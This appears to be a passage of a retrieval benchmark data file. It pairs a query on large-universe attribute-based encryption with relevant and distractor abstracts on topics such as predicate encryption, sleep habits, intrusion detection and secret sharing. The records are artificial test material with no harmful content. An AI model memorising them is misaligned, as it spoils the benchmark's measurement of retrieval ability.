"text": "OBJECTIVE\nThe authors' purpose in this study was to determine the sleep patterns of college students to identify problem areas and potential solutions.\n\n\nPARTICIPANTS\nA total of 313 students returned completed surveys.\n\n\nMETHODS\nA sleep survey was e-mailed to a random sample of students at a North Central university. Questions included individual sleep patterns, problems, and possible influencing factors.\n\n\nRESULTS\nMost students reported later bedtimes and rise times on weekends than they did on weekdays. More than 33% of the students took longer than 30 minutes to fall asleep, and 43% woke more than once nightly. More than 33% reported being tired during the day. The authors found no differences between freshmen, sophomores, juniors, seniors, and graduate students for time to fall asleep, number of night wakings, or total time slept each night.\n\n\nCONCLUSIONS\nMany students have sleep problems that may interfere with daily performance, such as driving and academics. Circadian rhythm management, sleep hygiene, and white noise could ameliorate sleep difficulties.",
"title": ""
},
{
"docid": "d3e561a6ac610d84921664662b57ed33",
"text": "Antibiotic resistance is ancient and widespread in environmental bacteria. These are therefore reservoirs of resistance elements and reflective of the natural history of antibiotics and resistance. In a previous study, we discovered that multi-drug resistance is common in bacteria isolated from Lechuguilla Cave, an underground ecosystem that has been isolated from the surface for over 4 Myr. Here we use whole-genome sequencing, functional genomics and biochemical assays to reveal the intrinsic resistome of Paenibacillus sp. LC231, a cave bacterial isolate that is resistant to most clinically used antibiotics. We systematically link resistance phenotype to genotype and in doing so, identify 18 chromosomal resistance elements, including five determinants without characterized homologues and three mechanisms not previously shown to be involved in antibiotic resistance. A resistome comparison across related surface Paenibacillus affirms the conservation of resistance over millions of years and establishes the longevity of these genes in this genus.",
"title": ""
}
] | scidocsrr |
53c8c26f761c6e2259cebfecda1502d1 | New Constructions and Proof Methods for Large Universe Attribute-Based Encryption | [
{
"docid": "1600d4662fc5939c5f737756e2d3e823",
"text": "Predicate encryption is a new paradigm for public-key encryption that generalizes identity-based encryption and more. In predicate encryption, secret keys correspond to predicates and ciphertexts are associated with attributes; the secret key SK f corresponding to a predicate f can be used to decrypt a ciphertext associated with attribute I if and only if f(I)=1. Constructions of such schemes are currently known only for certain classes of predicates. We construct a scheme for predicates corresponding to the evaluation of inner products over ℤ N (for some large integer N). This, in turn, enables constructions in which predicates correspond to the evaluation of disjunctions, polynomials, CNF/DNF formulas, thresholds, and more. Besides serving as a significant step forward in the theory of predicate encryption, our results lead to a number of applications that are interesting in their own right.",
"title": ""
}
] | [
{
"docid": "9001f640ae3340586f809ab801f78ec0",
"text": "A correct perception of road signalizations is required for autonomous cars to follow the traffic codes. Road marking is a signalization present on road surfaces and commonly used to inform the correct lane cars must keep. Cameras have been widely used for road marking detection, however they are sensible to environment illumination. Some LIDAR sensors return infrared reflective intensity information which is insensible to illumination condition. Existing road marking detectors that analyzes reflective intensity data focus only on lane markings and ignores other types of signalization. We propose a road marking detector based on Otsu thresholding method that make possible segment LIDAR point clouds into asphalt and road marking. The results show the possibility of detecting any road marking (crosswalks, continuous lines, dashed lines). The road marking detector has also been integrated with Monte Carlo localization method so that its performance could be validated. According to the results, adding road markings onto curb maps lead to a lateral localization error of 0.3119 m.",
"title": ""
},
{
"docid": "98571cb7f32b389683e8a9e70bd87339",
"text": "We identify two issues with the family of algorithms based on the Adversarial Imitation Learning framework. The first problem is implicit bias present in the reward functions used in these algorithms. While these biases might work well for some environments, they can also lead to sub-optimal behavior in others. Secondly, even though these algorithms can learn from few expert demonstrations, they require a prohibitively large number of interactions with the environment in order to imitate the expert for many real-world applications. In order to address these issues, we propose a new algorithm called Discriminator-Actor-Critic that uses off-policy Reinforcement Learning to reduce policy-environment interaction sample complexity by an average factor of 10. Furthermore, since our reward function is designed to be unbiased, we can apply our algorithm to many problems without making any task-specific adjustments.",
"title": ""
},
{
"docid": "2b1caf45164e7453453eaaf006dc3827",
"text": "This paper presents an estimation of the longitudinal movement of an aircraft using the STM32 microcontroller F1 Family. The focus of this paper is on developing code to implement the famous Luenberger Observer and using the different devices existing in STM32 F1 micro-controllers. The suggested Luenberger observer was achieved using the Keil development tools designed for devices microcontrollers based on the ARM processor and labor with C / C ++ language. The Characteristics that show variations in time of the state variables and step responses prove that the identification of the longitudinal movement of an aircraft were performed with minor errors in the right conditions. These results lead to easily develop predictive algorithms for programmable hardware in the industry.",
"title": ""
},
{
"docid": "7ecfea8abc9ba29719cdd4bf02e99d5d",
"text": "The literature shows an increase in blended learning implementations (N = 74) at faculties of education in Turkey whereas pre-service and in-service teachers’ ICT competencies have been identified as one of the areas where they are in need of professional development. This systematic review was conducted to find out the impact of blended learning on academic achievement and attitudes at teacher education programs in Turkey. 21 articles and 10 theses complying with all pre-determined criteria (i.e., studies having quantitative research design or at least a quantitative aspect conducted at pre-service teacher education programs) included within the scope of this review. With regard to academic achievement, it was synthesized that majority of the studies confirmed its positive impact on attaining course outcomes. Likewise, blended learning environment was revealed to contribute pre-service teachers to develop positive attitudes towards the courses. It was also concluded that face-to-face aspect of the courses was favoured considerably as it enhanced social interaction between peers and teachers. Other benefits of blended learning were listed as providing various materials, receiving prompt feedback, and tracking progress. Slow internet access, connection failure and anxiety in some pre-service teachers on using ICT were reported as obstacles. Regarding the positive results of blended learning and the significance of ICT integration, pre-service teacher education curricula are suggested to be reconstructed by infusing ICT into entire program through blended learning rather than delivering isolated ICT courses which may thus serve for prospective teachers as catalysts to integrate the use of ICT in their own teaching.",
"title": ""
},
{
"docid": "842a1d2da67d614ecbc8470987ae85e9",
"text": "The task of recovering three-dimensional (3-D) geometry from two-dimensional views of a scene is called 3-D reconstruction. It is an extremely active research area in computer vision. There is a large body of 3-D reconstruction algorithms available in the literature. These algorithms are often designed to provide different tradeoffs between speed, accuracy, and practicality. In addition, even the output of various algorithms can be quite different. For example, some algorithms only produce a sparse 3-D reconstruction while others are able to output a dense reconstruction. The selection of the appropriate 3-D reconstruction algorithm relies heavily on the intended application as well as the available resources. The goal of this paper is to review some of the commonly used motion-parallax-based 3-D reconstruction techniques and make clear the assumptions under which they are designed. To do so efficiently, we classify the reviewed reconstruction algorithms into two large categories depending on whether a prior calibration of the camera is required. Under each category, related algorithms are further grouped according to the common properties they share.",
"title": ""
},
{
"docid": "ec40606c46cc1bd3e1d4c64793a8ca83",
"text": "Thin-layer chromatography (TLC) and liquid chromatography (LC) methods were developed for the qualitative and quantitative determination of agrimoniin, pedunculagin, ellagic acid, gallic acid, and catechin in selected herbal medicinal products from Rosaceae: Anserinae herba, Tormentillae rhizoma, Alchemillae herba, Agrimoniae herba, and Fragariae folium. Unmodified silica gel (TLC Si60, HPTLC LiChrospher Si60) and silica gel chemically modified with octadecyl or aminopropyl groups (HPTLC RP18W and HPTLC NH2) were used for TLC. The best resolution and selectivity were achieved with the following mobile phases: diisopropyl ether-acetone-formic acid-water (40 + 30 + 20 + 10, v/v/v/v), tetrahydrofuran-acetonitrile-water (30 + 10 + 60, v/v/v), and acetone-formic acid (60 + 40, v/v). Concentrations of the studied herbal drugs were determined by using a Chromolith Performance RP-18e column with acetonitrile-water-formic acid as the mobile phase. Determinations of linearity, range, detection and quantitation limits, accuracy, precision, and robustness showed that the HPLC method was sufficiently precise for estimation of the tannins and related polyphenols mentioned above. Investigations of suitable solvent selection, sample extraction procedure, and short-time stability of analytes at storage temperatures of 4 and 20 degrees C were also performed. The percentage of agrimoniin in pharmaceutical products was between 0.57 and 3.23%.",
"title": ""
},
{
"docid": "de67aeb2530695bcc6453791a5fa8c77",
"text": "Sebaceous carcinoma is a rare adenocarcinoma with variable degrees of sebaceous differentiation, most commonly found on periocular skin, but also occasionally occur extraocular. It can occur in isolation or as part of the MuirTorre syndrome. Sebaceous carcinomas are yellow or red nodules or plaques often with a friable surface, ulceration, or crusting. On histological examination, sebaceous carcinomas are typically poorly circumscribed, asymmetric, and infiltrative. Individual cells are pleomorphic with atypical nuclei, mitoses, and a coarsely vacuolated cytoplasm.",
"title": ""
},
{
"docid": "374b87b187fbc253477cd1e8f60e9d91",
"text": "Term Used Definition Provided Source I/T strategy None provided Henderson and Venkatraman 1999 Information Management Strategy \" A long-term precept for directing, implementing and supervising information management \" (information management left undefined) Reponen 1994 (p. 30) \" Deals with management of the entire information systems function, \" referring to Earl (1989, p. 117): \" the management framework which guides how the organization should run IS/IT activities \" Ragu-Nathan et al. 2001 (p. 269)",
"title": ""
},
{
"docid": "5a08b007fbe1a424f9788ea68ec47d80",
"text": "We introduce a novel ensemble model based on random projections. The contribution of using random projections is two-fold. First, the randomness provides the diversity which is required for the construction of an ensemble model. Second, random projections embed the original set into a space of lower dimension while preserving the dataset’s geometrical structure to a given distortion. This reduces the computational complexity of the model construction as well as the complexity of the classification. Furthermore, dimensionality reduction removes noisy features from the data and also represents the information which is inherent in the raw data by using a small number of features. The noise removal increases the accuracy of the classifier. The proposed scheme was tested using WEKA based procedures that were applied to 16 benchmark dataset from the UCI repository.",
"title": ""
},
{
"docid": "f03a96d81f7eeaf8b9befa73c2b6fbd5",
"text": "This research provided the first empirical investigation of how approach and avoidance motives for sacrifice in intimate relationships are associated with personal well-being and relationship quality. In Study 1, the nature of everyday sacrifices made by dating partners was examined, and a measure of approach and avoidance motives for sacrifice was developed. In Study 2, which was a 2-week daily experience study of college students in dating relationships, specific predictions from the theoretical model were tested and both longitudinal and dyadic components were included. Whereas approach motives for sacrifice were positively associated with personal well-being and relationship quality, avoidance motives for sacrifice were negatively associated with personal well-being and relationship quality. Sacrificing for avoidance motives was particularly detrimental to the maintenance of relationships over time. Perceptions of a partner's motives for sacrifice were also associated with well-being and relationship quality. Implications for the conceptualization of relationship maintenance processes along these 2 dimensions are discussed.",
"title": ""
},
{
"docid": "e389bed063035d3e9160d3136d2729a0",
"text": "We introduce and construct timed commitment schemes, an extension to the standard notion of commitments in which a potential forced opening phase permits the receiver to recover (with effort) the committed value without the help of the committer. An important application of our timed-commitment scheme is contract signing: two mutually suspicious parties wish to exchange signatures on a contract. We show a two-party protocol that allows them to exchange RSA or Rabin signatures. The protocol is strongly fair: if one party quits the protocol early, then the two parties must invest comparable amounts of time to retrieve the signatures. This statement holds even if one party has many more machines than the other. Other applications, including honesty preserving auctions and collective coin-flipping, are discussed.",
"title": ""
},
{
"docid": "c955e63d5c5a30e18c008dcc51d1194b",
"text": "We report, for the first time, the identification of fatty acid particles in formulations containing the surfactant polysorbate 20. These fatty acid particles were observed in multiple mAb formulations during their expected shelf life under recommended storage conditions. The fatty acid particles were granular or sand-like in morphology and were several microns in size. They could be identified by distinct IR bands, with additional confirmation from energy-dispersive X-ray spectroscopy analysis. The particles were readily distinguishable from protein particles by these methods. In addition, particles containing a mixture of protein and fatty acids were also identified, suggesting that the particulation pathways for the two particle types may not be distinct. The techniques and observations described will be useful for the correct identification of proteinaceous versus nonproteinaceous particles in pharmaceutical products.",
"title": ""
},
{
"docid": "760a02c6205b2e2e38d14fa91708c508",
"text": "The popular h-index used to measure scientific output can be described in terms of a pool of evaluated objects (the papers), a quality function on the evaluated objects (the number of citations received by each paper) and a sentencing line crossing the origin, whose intersection with the graph of the quality function yields the index value (in the h-index this is a line with slope 1). Based on this abstraction, we present a new index, the c-index, in which the evaluated objects are the citations received by an author, a group of authors, a journal, etc., the quality function of a citation is the collaboration distance between the authors of the cited and the citing papers, and the sentencing line can take slopes between 0 and ∞. As a result, the new index counts only those citations which are significant enough, where significance is proportional to collaboration distance. Several advantages of the new c-index with respect to previous proposals are discussed.",
"title": ""
},
{
"docid": "4ceab082d195c1f69bb98793852f4a29",
"text": "This paper presents a 22 to 26.5 Gb/s optical receiver with an all-digital clock and data recovery (AD-CDR) fabricated in a 65 nm CMOS process. The receiver consists of an optical front-end and a half-rate bang-bang clock and data recovery circuit. The optical front-end achieves low power consumption by using inverter-based amplifiers and realizes sufficient bandwidth by applying several bandwidth extension techniques. In addition, in order to minimize additional jitter at the front-end, not only magnitude and bandwidth but also group-delay responses are considered. The AD-CDR employs an LC quadrature digitally controlled oscillator (LC-QDCO) to achieve a high phase noise figure-of-merit at tens of gigahertz. The recovered clock jitter is 1.28 ps rms and the measured jitter tolerance exceeds the tolerance mask specified in IEEE 802.3ba. The receiver sensitivity is 106 and 184 for a bit error rate of 10-12 at data rates of 25 and 26.5 Gb/s, respectively. The entire receiver chip occupies an active die area of 0.75 mm2 and consumes 254 mW at a data rate of 26.5 Gb/s. The energy efficiencies of the front-end and entire receiver at 26.5 Gb/s are 1.35 and 9.58 pJ/bit, respectively.",
"title": ""
},
{
"docid": "4df5ae1f7eae0c366bd5bdb30af80ad2",
"text": "Robots inevitably fail, often without the ability to recover autonomously. We demonstrate an approach for enabling a robot to recover from failures by communicating its need for specific help to a human partner using natural language. Our approach automatically detects failures, then generates targeted spoken-language requests for help such as “Please give me the white table leg that is on the black table.” Once the human partner has repaired the failure condition, the system resumes full autonomy. We present a novel inverse semantics algorithm for generating effective help requests. In contrast to forward semantic models that interpret natural language in terms of robot actions and perception, our inverse semantics algorithm generates requests by emulating the human’s ability to interpret a request using the Generalized Grounding Graph (G) framework. To assess the effectiveness of our approach, we present a corpusbased online evaluation, as well as an end-to-end user study, demonstrating that our approach increases the effectiveness of human interventions compared to static requests for help.",
"title": ""
},
{
"docid": "c2dfa94555085b6ca3b752d719688613",
"text": "In this paper, we propose RNN-Capsule, a capsule model based on Recurrent Neural Network (RNN) for sentiment analysis. For a given problem, one capsule is built for each sentiment category e.g., ‘positive’ and ‘negative’. Each capsule has an attribute, a state, and three modules: representation module, probability module, and reconstruction module. The attribute of a capsule is the assigned sentiment category. Given an instance encoded in hidden vectors by a typical RNN, the representation module builds capsule representation by the attention mechanism. Based on capsule representation, the probability module computes the capsule’s state probability. A capsule’s state is active if its state probability is the largest among all capsules for the given instance, and inactive otherwise. On two benchmark datasets (i.e., Movie Review and Stanford Sentiment Treebank) and one proprietary dataset (i.e., Hospital Feedback), we show that RNN-Capsule achieves state-of-the-art performance on sentiment classification. More importantly, without using any linguistic knowledge, RNN-Capsule is capable of outputting words with sentiment tendencies reflecting capsules’ attributes. The words well reflect the domain specificity of the dataset. ACM Reference Format: Yequan Wang1 Aixin Sun2 Jialong Han3 Ying Liu4 Xiaoyan Zhu1. 2018. Sentiment Analysis by Capsules. InWWW 2018: The 2018 Web Conference, April 23–27, 2018, Lyon, France. ACM, New York, NY, USA, 10 pages. https://doi.org/10.1145/3178876.3186015",
"title": ""
},
{
"docid": "a75d3395a1d4859b465ccbed8647fbfe",
"text": "PURPOSE\nThe influence of a core-strengthening program on low back pain (LBP) occurrence and hip strength differences were studied in NCAA Division I collegiate athletes.\n\n\nMETHODS\nIn 1998, 1999, and 2000, hip strength was measured during preparticipation physical examinations and occurrence of LBP was monitored throughout the year. Following the 1999-2000 preparticipation physicals, all athletes began participation in a structured core-strengthening program, which emphasized abdominal, paraspinal, and hip extensor strengthening. Incidence of LBP and the relationship with hip muscle imbalance were compared between consecutive academic years.\n\n\nRESULTS\nAfter incorporation of core strengthening, there was no statistically significant change in LBP occurrence. Side-to-side extensor strength between athletes participating in both the 1998-1999 and 1999-2000 physicals were no different. After core strengthening, the right hip extensor was, on average, stronger than that of the left hip extensor (P = 0.0001). More specific gender differences were noted after core strengthening. Using logistic regression, female athletes with weaker left hip abductors had a more significant probability of requiring treatment for LBP (P = 0.009)\n\n\nCONCLUSION\nThe impact of core strengthening on collegiate athletes has not been previously examined. These results indicated no significant advantage of core strengthening in reducing LBP occurrence, though this may be more a reflection of the small numbers of subjects who actually required treatment. The core program, however, seems to have had a role in modifying hip extensor strength balance. The association between hip strength and future LBP occurrence, observed only in females, may indicate the need for more gender-specific core programs. The need for a larger scale study to examine the impact of core strengthening in collegiate athletes is demonstrated.",
"title": ""
},
{
"docid": "d5666bfb1fcd82ac89da2cb893ba9fb7",
"text": "Ad-servers have to satisfy many different targeting criteria, and the combination can often result in no feasible solution. We hypothesize that advertisers may be defining these metrics to create a kind of \"proxy target\". We therefore reformulate the standard ad-serving problem to one where we attempt to get as close as possible to the advertiser's multi-dimensional target inclusive of delivery. We use a simple simulation to illustrate the behavior of this algorithm compared to Constraint and Pacing strategies. The system is then deployed in one of the largest video ad-servers in the United States and we show experimental results from live test ads, as well as 6 months of production performance across hundreds of ads. We find that the live ad-server tests match the simulation, and we report significant gains in multi-KPI performance from using the error minimization strategy.",
"title": ""
},
{
"docid": "e668eddaa2cec83540a992e09e0be368",
"text": "The increasing number of attacks on internet-based systems calls for security measures on behalf those systems’ operators. Beside classical methods and tools for penetration testing, there exist additional approaches using publicly available search engines. We present an alternative approach using contactless vulnerability analysis with both classical and subject-specific search engines. Based on an extension and combination of their functionality, this approach provides a method for obtaining promising results for audits of IT systems, both quantitatively and qualitatively. We evaluate our approach and confirm its suitability for a timely determination of vulnerabilities in large-scale networks. In addition, the approach can also be used to perform vulnerability analyses of network areas or domains in unclear legal situations.",
"title": ""
},
{
"docid": "f3fc221d2d57163f43f165400b9eee02",
"text": "Article history: Received 13 March 2017 Received in revised form 19 June 2017 Accepted 4 July 2017 Available online xxxx",
"title": ""
}
] | scidocsrr |
a10ec8373a777cf959c5f0812920f46f | On Validity of Program Transformations in the Java Memory Model | [
{
"docid": "b9a14bea9bb5af017ab325efe76bae84",
"text": "A semantics to a small fragment of Java capturing the new memory model (JMM) described in the Language Specification is given by combining operational, denotational and axiomatic techniques in a novel semantic framework. The operational steps (specified in the form of SOS) construct denotational models (configuration structures) and are constrained by the axioms of a configuration theory. The semantics is proven correct with respect to the Language Specification and shown to capture many common examples in the JMM literature.",
"title": ""
}
] | [
{
"docid": "8ac6160d8e6f7d425e2b2416626e5c2d",
"text": "This report presents a concept design for the algorithms part of the STL and outlines the design of the supporting language mechanism. Both are radical simplifications of what was proposed in the C++0x draft. In particular, this design consists of only 41 concepts (including supporting concepts), does not require concept maps, and (perhaps most importantly) does not resemble template metaprogramming.",
"title": ""
},
{
"docid": "80f79899a8a049a3cb66c045a6d2f902",
"text": "BACKGROUND\nUnderstanding the factors regulating our microbiota is important but requires appropriate statistical methodology. When comparing two or more populations most existing approaches either discount the underlying compositional structure in the microbiome data or use probability models such as the multinomial and Dirichlet-multinomial distributions, which may impose a correlation structure not suitable for microbiome data.\n\n\nOBJECTIVE\nTo develop a methodology that accounts for compositional constraints to reduce false discoveries in detecting differentially abundant taxa at an ecosystem level, while maintaining high statistical power.\n\n\nMETHODS\nWe introduced a novel statistical framework called analysis of composition of microbiomes (ANCOM). ANCOM accounts for the underlying structure in the data and can be used for comparing the composition of microbiomes in two or more populations. ANCOM makes no distributional assumptions and can be implemented in a linear model framework to adjust for covariates as well as model longitudinal data. ANCOM also scales well to compare samples involving thousands of taxa.\n\n\nRESULTS\nWe compared the performance of ANCOM to the standard t-test and a recently published methodology called Zero Inflated Gaussian (ZIG) methodology (1) for drawing inferences on the mean taxa abundance in two or more populations. ANCOM controlled the false discovery rate (FDR) at the desired nominal level while also improving power, whereas the t-test and ZIG had inflated FDRs, in some instances as high as 68% for the t-test and 60% for ZIG. We illustrate the performance of ANCOM using two publicly available microbial datasets in the human gut, demonstrating its general applicability to testing hypotheses about compositional differences in microbial communities.\n\n\nCONCLUSION\nAccounting for compositionality using log-ratio analysis results in significantly improved inference in microbiota survey data.",
"title": ""
},
{
"docid": "189cc09c72686ae7282eef04c1b365f1",
"text": "With the rapid growth of the internet as well as increasingly more accessible mobile devices, the amount of information being generated each day is enormous. We have many popular websites such as Yelp, TripAdvisor, Grubhub etc. that offer user ratings and reviews for different restaurants in the world. In most cases, though, the user is just interested in a small subset of the available information, enough to get a general overview of the restaurant and its popular dishes. In this paper, we present a way to mine user reviews to suggest popular dishes for each restaurant. Specifically, we propose a method that extracts and categorize dishes from Yelp restaurant reviews, and then ranks them to recommend the most popular dishes.",
"title": ""
},
{
"docid": "5d1b66986357f2566ac503727a80bb87",
"text": "Natural Language Inference (NLI) task requires an agent to determine the logical relationship between a natural language premise and a natural language hypothesis. We introduce Interactive Inference Network (IIN), a novel class of neural network architectures that is able to achieve high-level understanding of the sentence pair by hierarchically extracting semantic features from interaction space. We show that an interaction tensor (attention weight) contains semantic information to solve natural language inference, and a denser interaction tensor contains richer semantic information. One instance of such architecture, Densely Interactive Inference Network (DIIN), demonstrates the state-of-the-art performance on large scale NLI copora and large-scale NLI alike corpus. It’s noteworthy that DIIN achieve a greater than 20% error reduction on the challenging Multi-Genre NLI (MultiNLI; Williams et al. 2017) dataset with respect to the strongest published system.",
"title": ""
},
{
"docid": "1844a5877f911ecaf932282e5a67b727",
"text": "Many online social network (OSN) users are unaware of the numerous security risks that exist in these networks, including privacy violations, identity theft, and sexual harassment, just to name a few. According to recent studies, OSN users readily expose personal and private details about themselves, such as relationship status, date of birth, school name, email address, phone number, and even home address. This information, if put into the wrong hands, can be used to harm users both in the virtual world and in the real world. These risks become even more severe when the users are children. In this paper, we present a thorough review of the different security and privacy risks, which threaten the well-being of OSN users in general, and children in particular. In addition, we present an overview of existing solutions that can provide better protection, security, and privacy for OSN users. We also offer simple-to-implement recommendations for OSN users, which can improve their security and privacy when using these platforms. Furthermore, we suggest future research directions.",
"title": ""
},
{
"docid": "6dbaeff4f3cb814a47e8dc94c4660d33",
"text": "An Intrusion Detection System (IDS) is a software that monitors a single or a network of computers for malicious activities (attacks) that are aimed at stealing or censoring information or corrupting network protocols. Most techniques used in today’s IDS are not able to deal with the dynamic and complex nature of cyber attacks on computer networks. Hence, efficient adaptive methods like various techniques of machine learning can result in higher detection rates, lower false alarm rates and reasonable computation and communication costs. In this paper, we study several such schemes and compare their performance. We divide the schemes into methods based on classical artificial intelligence (AI) and methods based on computational intelligence (CI). We explain how various characteristics of CI techniques can be used to build efficient IDS.",
"title": ""
},
{
"docid": "dd6b50a56b740d07f3d02139d16eeec4",
"text": "Mitochondria play a central role in the aging process. Studies in model organisms have started to integrate mitochondrial effects on aging with the maintenance of protein homeostasis. These findings center on the mitochondrial unfolded protein response (UPR(mt)), which has been implicated in lifespan extension in worms, flies, and mice, suggesting a conserved role in the long-term maintenance of cellular homeostasis. Here, we review current knowledge of the UPR(mt) and discuss its integration with cellular pathways known to regulate lifespan. We highlight how insight into the UPR(mt) is revolutionizing our understanding of mitochondrial lifespan extension and of the aging process.",
"title": ""
},
{
"docid": "5c690df3977b078243b9cb61e5e712a6",
"text": "Computing indirect illumination is a challenging and complex problem for real-time rendering in 3D applications. We present a global illumination approach that computes indirect lighting in real time using a simplified version of the outgoing radiance and the scene stored in voxels. This approach comprehends two-bounce indirect lighting for diffuse, specular and emissive materials. Our voxel structure is based on a directional hierarchical structure stored in 3D textures with mipmapping, the structure is updated in real time utilizing the GPU which enables us to approximate indirect lighting for dynamic scenes. Our algorithm employs a voxel-light pass which calculates voxel direct and global illumination for the simplified outgoing radiance. We perform voxel cone tracing within this voxel structure to approximate different lighting phenomena such as ambient occlusion, soft shadows and indirect lighting. We demonstrate with different tests that our developed approach is capable to compute global illumination of complex scenes on interactive times.",
"title": ""
},
{
"docid": "a92ec968ed54217126dc84660a6602b5",
"text": "In the wake of new forms of curricular policy in many parts of the world, teachers are increasingly required to act as agents of change. And yet, teacher agency is under-theorised and often misconstrued in the educational change literature, wherein agency and change are seen as synonymous and positive. This paper addresses the issue of teacher agency in the context of an empirical study of curriculum making in schooling. Drawing upon the existing literature, we outline an ecological view of agency as an effect. These insights frame the analysis of a set of empirical data, derived from a research project about curriculum-making in a school and further education college in Scotland. Based upon the evidence, we argue that the extent to which teachers are able to achieve agency varies from context to context based upon certain environmental conditions of possibility and constraint, and that an important factor in this lies in the beliefs, values and attributes that teachers mobilise in relation to particular situations.",
"title": ""
},
{
"docid": "dbdbdf3df12ef47c778e0e9f4ddfc7d6",
"text": "In the recent years, research on speech recognition has given much diligence to the automatic transcription of speech data such as broadcast news (BN), medical transcription, etc. Large Vocabulary Continuous Speech Recognition (LVCSR) systems have been developed successfully for Englishes (American English (AE), British English (BE), etc.) and other languages but in case of Indian English (IE), it is still at infancy stage. IE is one of the varieties of English spoken in Indian subcontinent and is largely different from the English spoken in other parts of the world. In this paper, we have presented our work on LVCSR of IE video lectures. The speech data contains video lectures on various engineering subjects given by the experts from all over India as part of the NPTEL project which comprises of 23 hours. We have used CMU Sphinx for training and decoding in our large vocabulary continuous speech recognition experiments. The results analysis instantiate that building IE acoustic model for IE speech recognition is essential due to the fact that it has given 34% less average word error rate (WER) than HUB-4 acoustic models. The average WER before and after adaptation of IE acoustic model is 38% and 31% respectively. Even though, our IE acoustic model is trained with limited training data and the corpora used for building the language models do not mimic the spoken language, the results are promising and comparable to the results reported for AE lecture recognition in the literature.",
"title": ""
},
{
"docid": "ea8a7678dc2b0059ed491cb311f71c52",
"text": "With the advent of safety needles to prevent inadvertent needle sticks in the operating room (OR), a potentially new issue has arisen. These needles may result in coring, or the shaving off of fragments of the rubber stopper, when the needle is pierced through the rubber stopper of the medication vial. These fragments may be left in the vial and then drawn up with the medication and possibly injected into patients. The current study prospectively evaluated the incidence of coring when blunt and sharp needles were used to pierce rubber topped vials. We also evaluated the incidence of coring in empty medication vials with rubber tops. The rubber caps were then pierced with either an18-gauge sharp hypodermic needle or a blunt plastic (safety) needle. Coring occurred in 102 of 250 (40.8%) vials when a blunt needle was used versus 9 of 215 (4.2%) vials with a sharp needle (P < 0.0001). A significant incidence of coring was demonstrated when a blunt plastic safety needle was used. This situation is potentially a patient safety hazard and methods to eliminate this problem are needed.",
"title": ""
},
{
"docid": "89c52082d42a9f6445a7771852db3330",
"text": "Total quality management (TQM) is an approach to management embracing both social and technical dimensions aimed at achieving excellent results, which needs to be put into practice through a specific framework. Nowadays, quality award models, such as the Malcolm Baldrige National Quality Award (MBNQA) and the European Foundation for Quality Management (EFQM) Excellence Model, are used as a guide to TQM implementation by a large number of organizations. Nevertheless, there is a paucity of empirical research confirming whether these models clearly reflect the main premises of TQM. The purpose of this paper is to analyze the extent to which the EFQM Excellence Model captures the main assumptions involved in the TQM concept, that is, the distinction between technical and social TQM issues, the holistic interpretation of TQM in the firm, and the causal linkage between TQM procedures and organizational performance. Based on responses collected from managers of 446 Spanish companies by means of a structured questionnaire, we find that: (a) social and technical dimensions are embedded in the model; (b) both dimensions are intercorrelated; (c) they jointly enhance results. These findings support the EFQM Excellence Model as an operational framework for TQM, and also reinforce the results obtained in previous studies for the MBNQA, suggesting that quality award models really are TQM frameworks. 2008 Elsevier B.V. All rights reserved. * Corresponding author. Tel.: +34 964 72 85 34; fax: +34 964 72 86 29. E-mail address: bou@emp.uji.es (J.C. Bou-Llusar).",
"title": ""
},
{
"docid": "198311a68ad3b9ee8020b91d0b029a3c",
"text": "Online multi-object tracking aims at producing complete tracks of multiple objects using the information accumulated up to the present moment. It still remains a difficult problem in complex scenes, because of frequent occlusion by clutter or other objects, similar appearances of different objects, and other factors. In this paper, we propose a robust online multi-object tracking method that can handle these difficulties effectively. We first propose the tracklet confidence using the detectability and continuity of a tracklet, and formulate a multi-object tracking problem based on the tracklet confidence. The multi-object tracking problem is then solved by associating tracklets in different ways according to their confidence values. Based on this strategy, tracklets sequentially grow with online-provided detections, and fragmented tracklets are linked up with others without any iterative and expensive associations. Here, for reliable association between tracklets and detections, we also propose a novel online learning method using an incremental linear discriminant analysis for discriminating the appearances of objects. By exploiting the proposed learning method, tracklet association can be successfully achieved even under severe occlusion. Experiments with challenging public datasets show distinct performance improvement over other batch and online tracking methods.",
"title": ""
},
{
"docid": "e3b91b1133a09d7c57947e2cd85a17c7",
"text": "Although mobile devices are gaining more and more capabilities (i.e. CPU power, memory, connectivity, ...), they still fall short to execute complex rich media and data analysis applications. Offloading to the cloud is not always a solution, because of the high WAN latencies, especially for applications with real-time constraints such as augmented reality. Therefore the cloud has to be moved closer to the mobile user in the form of cloudlets. Instead of moving a complete virtual machine from the cloud to the cloudlet, we propose a more fine grained cloudlet concept that manages applications on a component level. Cloudlets do not have to be fixed infrastructure close to the wireless access point, but can be formed in a dynamic way with any device in the LAN network with available resources. We present a cloudlet architecture together with a prototype implementation, showing the advantages and capabilities for a mobile real-time augmented reality application.",
"title": ""
},
{
"docid": "b7fc7aa3a0824c71bc3b00f335b7b65e",
"text": "In this paper we advocate the use of device-to-device (D2D) communications in a LoRaWAN Low Power Wide Area Network (LPWAN). After overviewing the critical features of the LoRaWAN technology, we discuss the pros and cons of enabling the D2D communications for it. Subsequently we propose a network-assisted D2D communications protocol and show its feasibility by implementing it on top of a LoRaWAN-certified commercial transceiver. The conducted experiments show the performance of the proposed D2D communications protocol and enable us to assess its performance. More precisely, we show that the D2D communications can reduce the time and energy for data transfer by 6 to 20 times compared to conventional LoRaWAN data transfer mechanisms. In addition, the use of D2D communications may have a positive effect on the network by enabling spatial re-use of the frequency resources. The proposed LoRaWAN D2D communications can be used for a wide variety of applications requiring high coverage, e.g. use cases in distributed smart grid deployments for management and trading.",
"title": ""
},
{
"docid": "eb7990a677cd3f96a439af6620331400",
"text": "Solving the visual symbol grounding problem has long been a goal of artificial intelligence. The field appears to be advancing closer to this goal with recent breakthroughs in deep learning for natural language grounding in static images. In this paper, we propose to translate videos directly to sentences using a unified deep neural network with both convolutional and recurrent structure. Described video datasets are scarce, and most existing methods have been applied to toy domains with a small vocabulary of possible words. By transferring knowledge from 1.2M+ images with category labels and 100,000+ images with captions, our method is able to create sentence descriptions of open-domain videos with large vocabularies. We compare our approach with recent work using language generation metrics, subject, verb, and object prediction accuracy, and a human evaluation.",
"title": ""
},
{
"docid": "9a9dc194e0ca7d1bb825e8aed5c9b4fe",
"text": "In this paper we show how to divide data <italic>D</italic> into <italic>n</italic> pieces in such a way that <italic>D</italic> is easily reconstructable from any <italic>k</italic> pieces, but even complete knowledge of <italic>k</italic> - 1 pieces reveals absolutely no information about <italic>D</italic>. This technique enables the construction of robust key management schemes for cryptographic systems that can function securely and reliably even when misfortunes destroy half the pieces and security breaches expose all but one of the remaining pieces.",
"title": ""
},
{
"docid": "fbf2a211d53603cbcb7441db3006f035",
